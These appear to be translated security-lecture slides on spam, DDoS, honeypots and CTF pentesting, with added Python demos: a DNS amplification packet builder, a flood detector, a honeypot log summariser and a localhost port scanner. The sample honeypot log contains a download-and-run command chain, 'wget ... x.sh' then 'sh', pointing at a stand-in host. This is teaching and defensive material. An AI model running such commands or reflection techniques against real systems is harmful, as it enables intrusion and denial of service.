5. Attack Event
● Past
○ ATM turned into a pinball machine
○ Web ATM vulnerability [2]
○ Websites hacked [3]
○ Spam
○ Home routers used as a botnet [4]
○ APT against government agencies [5]
6. Attack Event (cont’d)
● Current
○ APT
○ Hack as a Service [6]
○ Mobile hacking [7]
○ Heartbleed [8]
○ Orphaned (forgotten, unmaintained) DNS / NTP servers
○ IoT hacking
7. SPAM
● Email you did not ask for
○ Randomly generated, sent in bulk
○ APT (targeted at you)
● Spam may carry
○ Phishing links
○ Malware
○ CryptoLocker [10]
○ ...
8. SPAM + Exploit
● So receiving spam is harmless as long as I…
○ Don't download the attachment?
○ Don't click the link?
● Exploits against the receiving software (mail client / webmail), no click needed
○ Malicious web page
○ Document preview
○ ...
9. DDoS
● Past
○ Ping of Death
○ SYN flood
○ Teardrop attack
○ Slow I/O attack (Slowloris-style slow HTTP)
○ …
● Root cause: design flaws in the program or the protocol
11. DDoS + DNS / NTP
● Seven Wounds Fist (七傷拳): you hurt yourself while hurting the enemy
○ I DDoS U === U DDoS I (with a spoofed source address, the reflector floods the victim and the victim appears to be attacking the reflector)
● Amplification attack (reflection)
○ Small GET request => full web page in response
○ Small DNS request => large DNS response
○ ...
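To make the "small request => large response" point concrete, here is an added example (not from the original slides) that builds a DNS ANY query with an EDNS0 OPT record on the wire, constructs the kind of TXT-heavy reply an open resolver would send back, and computes the bandwidth amplification factor. The zone name, record count and record contents are constructed for the demo; the only thing the reflector needs in order to hit the victim is that UDP lets the attacker spoof the victim's address as the query source.

```python
import struct


def encode_name(name):
    """Encode a DNS name as length-prefixed labels terminated by a zero byte."""
    out = b""
    for label in name.rstrip(".").split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"


def build_query(name, qtype=255, txid=0x1234, edns_udp_size=4096):
    """DNS query (default QTYPE 255 = ANY) with an EDNS0 OPT record.
    The large EDNS UDP payload size tells the server it may answer with a big UDP datagram."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 1)  # RD=1, 1 question, 1 additional (OPT)
    question = encode_name(name) + struct.pack("!HH", qtype, 1)  # QTYPE, QCLASS=IN
    # OPT RR: root name, TYPE=41, CLASS=requestor UDP size, TTL=0 (flags), RDLEN=0
    opt_rr = b"\x00" + struct.pack("!HHIH", 41, edns_udp_size, 0, 0)
    return header + question + opt_rr


def build_txt_rr(name, text, ttl=300):
    """One TXT resource record; TXT RDATA is a length-prefixed character-string (<= 255 bytes)."""
    rdata = bytes([len(text)]) + text.encode("ascii")
    return encode_name(name) + struct.pack("!HHIH", 16, 1, ttl, len(rdata)) + rdata


def build_response(query, answer_rrs):
    """Constructed reply to `query`: same transaction id, QR=1 RD=1 RA=1, question echoed, answers appended."""
    txid = struct.unpack("!H", query[:2])[0]
    qname_end = query.index(b"\x00", 12) + 1  # terminating zero of QNAME after the 12-byte header
    question = query[12:qname_end + 4]         # QNAME + QTYPE + QCLASS
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, len(answer_rrs), 0, 0)
    return header + question + b"".join(answer_rrs)


def parse_header(msg):
    """Decode the fixed 12-byte DNS header."""
    txid, flags, qd, an, ns, ar = struct.unpack("!HHHHHH", msg[:12])
    return {"id": txid, "is_response": bool(flags & 0x8000),
            "qdcount": qd, "ancount": an, "nscount": ns, "arcount": ar}


def amplification_factor(query, response):
    """Bytes the reflector sends to the (spoofed) victim per byte the attacker had to send."""
    return len(response) / len(query)


def demo(name="example.com", records=8, txt_len=200):
    # Constructed zone data: several near-maximal TXT records, the content that makes ANY answers big.
    query = build_query(name)
    rrs = [build_txt_rr(name, "A" * txt_len) for _ in range(records)]
    response = build_response(query, rrs)
    return {"query_bytes": len(query), "response_bytes": len(response),
            "factor": amplification_factor(query, response), "header": parse_header(response)}


if __name__ == "__main__":
    r = demo()
    print(f"query {r['query_bytes']} B -> response {r['response_bytes']} B, x{r['factor']:.1f}")
```

The 40-byte query here draws a reply of about 1.8 KB, roughly 45x, and the attacker never receives it: the reflector answers whatever source address the UDP datagram claimed. Closing open resolvers (and NTP `monlist`) and deploying source-address validation at the ISP edge are what actually remove the multiplier.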
12. Avoiding DDoS
● Illusions
○ A high-end firewall
○ The ISP will handle it
○ Lots of backends
● Attackers always hit the weakest point
○ Load balancer / proxy server / DNS server / ...
13. Why DDoS Is Hard to Avoid
● Pattern matching
○ Cannot respond immediately (a pattern has to build up first)
○ What if the bot simulates a normal user?
○ Variants are easy to produce
● Total solution
○ Isolationism (cut the country off from the Internet)?
○ The ISP?
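Added example (not part of the original slides) of why pattern matching alone falls short: a per-client sliding-window rate check run over constructed access-log lines. The naive flooder is caught, but only after its window has filled; a bot that throttles itself to a "general user" rate is never flagged, and the obvious variant, many such clients in parallel, delivers the same load with zero detections. The log format and IP addresses are constructed for the demo.

```python
from collections import defaultdict, deque

WINDOW_SECONDS = 1.0
THRESHOLD = 5  # more than this many requests from one client inside the window => flood


def parse_line(line):
    """Constructed log format: '<unix_time> <client_ip> <method> <path>'."""
    ts, ip, method, path = line.split()
    return float(ts), ip, method, path


def flag_floods(lines, window=WINDOW_SECONDS, threshold=THRESHOLD):
    """Sliding-window rate check per client IP. Returns {ip: time it was first flagged}.
    A client can only be flagged once enough requests are in its window, so detection always lags."""
    recent = defaultdict(deque)
    flagged = {}
    for line in sorted(lines, key=lambda l: float(l.split()[0])):
        ts, ip, _, _ = parse_line(line)
        q = recent[ip]
        q.append(ts)
        while q and ts - q[0] > window:   # drop requests that fell out of the window
            q.popleft()
        if len(q) > threshold and ip not in flagged:
            flagged[ip] = ts
    return flagged


def make_requests(ip, start, count, interval, path="/index.php"):
    """Constructed traffic: `count` GETs from `ip`, one every `interval` seconds."""
    return [f"{start + i * interval:.3f} {ip} GET {path}" for i in range(count)]


def demo():
    # Naive flooder: 20 requests in half a second from one address.
    flooder = make_requests("10.0.0.1", 1000.0, 20, 0.025)
    # "Simulate a general user": 4 requests/second, under the threshold, for a full minute.
    polite_bot = make_requests("10.0.0.2", 1000.0, 240, 0.25)
    # The easy variant: 50 polite bots in parallel, 200 requests/second to the backend.
    botnet = [line for n in range(50)
              for line in make_requests(f"10.0.1.{n}", 1000.0, 240, 0.25)]
    return {
        "flooder": flag_floods(flooder),
        "polite_bot": flag_floods(polite_bot),
        "botnet_flagged": len(flag_floods(botnet)),
        "botnet_requests": len(botnet),
    }


if __name__ == "__main__":
    print(demo())
```

Lowering the threshold until the polite bot trips it also trips real users behind a shared NAT, which is the "variant is easy" problem from the defender's side: every fixed pattern has a cheap counter-variant, and the remaining levers (absorbing capacity, upstream filtering at the ISP) are outside the application.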
14. HoneyPot
● A trap set to detect unauthorized users
○ Also called a decoy / trap system (蜜罐 / 誘捕系統)
○ A logging system built on a full or simulated system
● Concept
○ Assume it will be hacked
○ Log everything
○ Analyze
16. HoneyPot + Analysis
● SPAM
○ Register a mail domain that has never been used
○ Anything it receives is spam sent to randomly generated addresses
● Sandbox
○ Simulate human behavior
○ Analyze the system state afterwards
17. HoneyPot + Analysis
● A honeypot is constantly being hacked
○ Too many events
○ Hard to analyze by tracing the log one entry at a time
● Visualization
○ It is trendy
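Added example (not from the original slides) of the "too many events" step: instead of reading a honeypot log line by line, aggregate it. The input is a constructed JSON-lines log in the style of an SSH honeypot (connect, login, command events); the sources, credentials and commands are made up for the demo. The summary answers the questions an analyst actually asks: who knocks most, which credentials are being sprayed, and in which sessions the attacker got in and what they ran.

```python
import json
from collections import Counter, defaultdict

# Constructed honeypot events, one JSON object per line (not real captured data).
SAMPLE_LOG = """\
{"ts": "2014-05-01T02:00:01Z", "src": "198.51.100.7", "event": "connect", "session": "s1"}
{"ts": "2014-05-01T02:00:02Z", "src": "198.51.100.7", "event": "login", "session": "s1", "user": "root", "password": "123456", "ok": false}
{"ts": "2014-05-01T02:00:03Z", "src": "198.51.100.7", "event": "login", "session": "s1", "user": "root", "password": "password", "ok": false}
{"ts": "2014-05-01T02:00:04Z", "src": "198.51.100.7", "event": "login", "session": "s1", "user": "admin", "password": "admin", "ok": false}
{"ts": "2014-05-01T02:05:00Z", "src": "198.51.100.7", "event": "connect", "session": "s2"}
{"ts": "2014-05-01T02:05:01Z", "src": "198.51.100.7", "event": "login", "session": "s2", "user": "root", "password": "123456", "ok": false}
{"ts": "2014-05-01T03:10:00Z", "src": "203.0.113.9", "event": "connect", "session": "s3"}
{"ts": "2014-05-01T03:10:01Z", "src": "203.0.113.9", "event": "login", "session": "s3", "user": "root", "password": "123456", "ok": false}
{"ts": "2014-05-01T03:10:02Z", "src": "203.0.113.9", "event": "login", "session": "s3", "user": "root", "password": "toor", "ok": true}
{"ts": "2014-05-01T03:10:05Z", "src": "203.0.113.9", "event": "command", "session": "s3", "cmd": "uname -a"}
{"ts": "2014-05-01T03:10:09Z", "src": "203.0.113.9", "event": "command", "session": "s3", "cmd": "wget http://example.invalid/x.sh -O /tmp/x.sh"}
{"ts": "2014-05-01T03:10:12Z", "src": "203.0.113.9", "event": "command", "session": "s3", "cmd": "sh /tmp/x.sh"}
{"ts": "2014-05-01T03:20:00Z", "src": "203.0.113.9", "event": "connect", "session": "s4"}
{"ts": "2014-05-01T03:20:01Z", "src": "203.0.113.9", "event": "login", "session": "s4", "user": "root", "password": "123456", "ok": false}
{"ts": "2014-05-01T04:00:00Z", "src": "192.0.2.55", "event": "connect", "session": "s5"}
{"ts": "2014-05-01T04:00:01Z", "src": "192.0.2.55", "event": "login", "session": "s5", "user": "admin", "password": "admin", "ok": false}
"""


def parse_events(text):
    """One JSON object per non-empty line."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def summarize(events, top_n=3):
    """Aggregate raw events into the few tables an analyst looks at first."""
    connections_by_src = Counter(e["src"] for e in events if e["event"] == "connect")
    credentials = Counter((e["user"], e["password"]) for e in events if e["event"] == "login")
    # sessions where a login succeeded: these are the ones worth reading in full
    compromised = {e["session"]: e["src"] for e in events if e["event"] == "login" and e["ok"]}
    commands = defaultdict(list)
    for e in events:
        if e["event"] == "command" and e["session"] in compromised:
            commands[e["session"]].append(e["cmd"])
    return {
        "connections_by_src": connections_by_src,
        "top_credentials": credentials.most_common(top_n),
        "compromised_sessions": {s: {"src": src, "commands": commands[s]} for s, src in compromised.items()},
    }


def bar_chart(counter, width=30):
    """Minimal text visualization: one '#' bar per key, scaled to `width`."""
    if not counter:
        return []
    peak = max(counter.values())
    return [f"{key:<16} {'#' * max(1, round(n * width / peak))} {n}" for key, n in counter.most_common()]


if __name__ == "__main__":
    report = summarize(parse_events(SAMPLE_LOG))
    print("\n".join(bar_chart(report["connections_by_src"])))
    print(report["top_credentials"])
    print(report["compromised_sessions"])
```

The same grouping (by source, by credential, by session) is what honeypot dashboards draw; the text bars are the degenerate case. The real analytical value is the last table: one successful session out of sixteen lines, and its command chain (recon, download, execute) is the sample worth feeding to the sandbox step above.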
21. Why CTF
● Practice as a hacker, legally
● Simulate how hackers attack
● Defend against hackers
22. How CTF
● On an open network
○ Online
○ You are given a hint (an IP address with a service, or a binary)
○ Find the flag
● On a closed network
○ No limits
○ Every device in the subnet can be hacked
23. PenTest Flow
● Social engineering
● Scan with nmap [9] (scanning too aggressively looks like a DDoS…)
● Choose one target / service
○ Web / SSH / SMB / FTP / UPnP / IRC / ...
● Hacking
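Added example (not from the original slides, and not nmap itself) of the scan-then-choose steps in pure Python: a TCP connect scan with banner grabbing, plus a crude service guess from the banner so you know which target the next step attacks. To stay runnable offline it scans only 127.0.0.1 against a constructed local listener (the `SSH-2.0-...` banner is made up) and a port that is known to be closed; point `scan()` at anything else only with written authorization.

```python
import socket
import threading


def grab_banner(host, port, timeout=1.0):
    """TCP connect scan of one port. Returns the banner text for an open port
    ("" if it is open but silent) and None if the connection was refused or timed out."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.settimeout(timeout)
            try:
                return s.recv(256).decode("utf-8", errors="replace").strip()
            except socket.timeout:
                return ""  # open, but the service waits for the client to speak first
    except OSError:  # ConnectionRefusedError, timeouts and unreachable hosts all derive from OSError
        return None


def scan(host, ports, timeout=1.0):
    """Map each port to its banner (open), "" (open, silent) or None (closed / filtered)."""
    return {port: grab_banner(host, port, timeout) for port in ports}


def guess_service(banner):
    """Rough service guess from the banner: the 'choose one target / service' step."""
    b = (banner or "").upper()
    if b.startswith("SSH-"):
        return "SSH"
    if b.startswith("220 ") and "FTP" in b:
        return "FTP"
    if b.startswith("HTTP/"):
        return "Web"
    return "unknown"


def _serve_banner(listener, banner):
    # Hypothetical local service for the demo: accept one client, send a banner, close.
    conn, _ = listener.accept()
    with conn:
        conn.sendall(banner)
    listener.close()


def demo():
    """Stand-alone run against 127.0.0.1: one constructed listener plus one port known to be closed."""
    banner = b"SSH-2.0-OpenSSH_7.4 demo-banner\r\n"  # constructed, not a real host
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))  # port 0: let the OS pick a free port
    listener.listen(1)
    open_port = listener.getsockname()[1]
    threading.Thread(target=_serve_banner, args=(listener, banner), daemon=True).start()

    probe = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    probe.bind(("127.0.0.1", 0))
    closed_port = probe.getsockname()[1]  # free right now, so nothing listens on it
    probe.close()

    results = scan("127.0.0.1", [open_port, closed_port])
    return {"open": results[open_port], "closed": results[closed_port],
            "service": guess_service(results[open_port])}


if __name__ == "__main__":
    print(demo())
```

A full connect scan completes the TCP handshake on every port, which is exactly why it is noisy and why the slide's aside about looking like a DDoS is fair: run it with a per-port timeout and a modest rate, and prefer nmap's own timing templates when you have it.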